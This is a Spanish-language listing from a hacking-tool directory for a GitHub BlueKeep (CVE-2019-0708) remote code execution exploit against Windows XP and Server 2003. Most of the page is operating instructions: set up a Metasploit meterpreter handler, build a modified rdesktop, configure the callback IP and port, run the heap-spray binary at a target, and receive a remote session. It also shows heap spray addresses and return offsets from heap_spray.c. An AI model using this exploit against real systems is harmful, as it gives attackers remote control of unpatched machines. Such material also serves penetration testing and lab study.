Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/coolboy4me/cve-2019-0708_bluekeep_rce
Análisis de VulnerabilidadesExplotaciónShellcodePruebas de PenetraciónHerramienta de Acceso RemotoDesarrollo de Payloads
GitHubcoolboy4me/cve-2019-0708_bluekeep_rce

cve-2019-0708_bluekeep_rce

funciona en xp (todas las versiones sp2 sp3)

Ver Repositorio
75143hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
  1. Ejecutar msfconsole meterpreter/multi/handler escuchando en 192.168.116.133:6000
  2. cd rdesktop-1.5.0 && make
  3. Modificar config, configurar IP y puerto de conexión de retorno 192.168.116.133 6000
  4. Ejecutar ./heap_spray 192.168.116.134 (134 es la dirección de XP, memoria >= 2GB)
  5. msfconsole meterpreter obtendrá una sesión

pd: shellcode/shellcode.asm es el código fuente del shellcode de kernel. Después de compilarlo y convertirlo a binario, se obtiene el archivo rdesktop-1.5.0\cf517d077e9c152120787eb6b251615b, que se compila directamente en el programa durante el make.

Actualmente solo es compatible con XP, se necesita memoria de XP >= 2GB

Si se necesita soporte para 2003, hay que modificar la macro HEAP_SPRAY_ADDRESS en heap_spray.c. Tras pruebas repetidas, esta dirección varía según la versión del sistema 2003 y el tamaño de memoria. Sin embargo, si se prueba en una máquina propia, se puede explotar con éxito en 2003. No es universal.

heap_spray.c

#ifdef _2003

#define HEAP_SPRAY_ADDRESS 0x953b09c0 //需要自己去windbg调试堆喷shellcode的地址 如果有朋友找到通用的解决方案欢迎提交issues

#define IcaChannelInputInternal_RET_OFFSET 0x268

#else

#define IcaChannelInputInternal_RET_OFFSET 0x274

#define HEAP_SPRAY_ADDRESS 0x88c969c0

#endif

Prueba en 2003

  1. Ejecutar msfconsole meterpreter/multi/handler escuchando en 192.168.116.133:6000
  2. cd rdesktop-1.5.0 && make
  3. Modificar config, configurar IP y puerto de conexión de retorno 192.168.116.133 6000
  4. Ejecutar ./_2003_heap_spray 192.168.116.135 (135 es la dirección de 2003, memoria >= 2GB)
  5. msfconsole meterpreter obtendrá una sesión

login

Descargar herramienta